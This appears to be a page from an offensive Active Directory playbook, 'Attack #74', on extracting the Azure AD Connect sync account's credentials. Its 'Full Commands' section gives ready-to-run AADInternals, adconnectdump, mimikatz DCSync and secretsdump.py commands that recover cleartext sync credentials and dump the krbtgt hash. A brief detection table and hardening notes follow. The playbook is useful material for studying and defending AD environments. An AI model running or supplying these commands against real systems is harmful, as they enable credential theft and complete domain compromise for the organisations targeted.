attack-74-azure-ad-connect-credential-extraction.md (3187B)
1 --- 2 title: "Attack #74 β Azure AD Connect Credential Extraction" 3 description: "Azure AD Connect synchronizes on-premises AD with Azure AD / Entra ID. The sync service stores a privileged AD account's credentials (the MSOL_ account orβ¦" 4 category: active-directory 5 subcategory: "Advanced & Post-Exploitation" 6 tags: ["active-directory", "credential-access", "privilege-escalation", "sql-injection"] 7 tools: ["Impacket", "Mimikatz", "PowerShell"] 8 difficulty: advanced 9 updated: "2026-08-10" 10 source: "vault:ActiveDirectory/AD-Attack/Category-Ten/π· Attack #74 β Azure AD Connect Credential Extraction.md" 11 --- 12 # π· Attack #74 β Azure AD Connect Credential Extraction 13 14 *** 15 16 ## π How It Works 17 18 Azure AD Connect synchronizes on-premises AD with Azure AD / Entra ID. The sync service stores a **privileged AD account's credentials** (the MSOL_ account or ADSync account) in a local database (encrypted with DPAPI). This account typically has **DCSync rights by default** β extracting its credentials from the Azure AD Connect server grants immediate DCSync capability. 19 20 *** 21 22 ## βοΈ Prerequisites 23 24 | Requirement | Detail | 25 |---|---| 26 | **Local admin on Azure AD Connect server** | To access the encrypted database | 27 | **Azure AD Connect installed** | With on-prem sync configured | 28 29 *** 30 31 ## π» Full Commands 32 33 ```powershell 34 # ββ AADInternals (PowerShell) βββββββββββββββββββββββββββββββββββββββββββββββββ 35 Install-Module AADInternals -Force 36 Import-Module AADInternals 37 Get-AADIntSyncCredentials 38 # Output: 39 # Domain: corp.local 40 # Username: MSOL_<hex> 41 # Password: <cleartext_password> 42 43 # ββ adconnectdump (manual extraction) βββββββββββββββββββββββββββββββββββββββββ 44 .\adconnectdump.exe 45 # Extracts MSOL_ credentials from the local SQL database 46 47 # ββ Now DCSync with the MSOL_ account βββββββββββββββββββββββββββββββββββββββββ 48 mimikatz.exe "lsadump::dcsync /domain:corp.local /user:krbtgt" exit 49 # MSOL_ account has DCSync rights by default 50 ``` 51 52 ```bash 53 # ββ From Linux (after extracting credentials) βββββββββββββββββββββββββββββββββ 54 secretsdump.py corp.local/MSOL_<hex>:'<password>'@DC01.corp.local -just-dc-user krbtgt 55 ``` 56 57 *** 58 59 ## π‘οΈ Detection β Event IDs 60 61 | Event ID | Source | What to Look For | 62 |---|---|---| 63 | **4662** | Security Log (DC) | MSOL_ account performing replication | 64 | **4624** | Security Log | MSOL_ logon from unexpected source (not the AD Connect server) | 65 66 *** 67 68 ## π Attack Chain Context 69 70 ``` 71 [Azure AD Connect] βββ Extract MSOL_ creds β DCSync β domain compromise 72 β 73 ββββ π MSOL_ account has DCSync rights by DEFAULT 74 ββββ π Compromise AD Connect server β full domain compromise 75 ββββ π Defeated by: harden AD Connect server, use gMSA for sync, monitor MSOL_ usage 76 ``` 77 78 *** 79 80 > β **Attack #74 β Azure AD Connect complete.**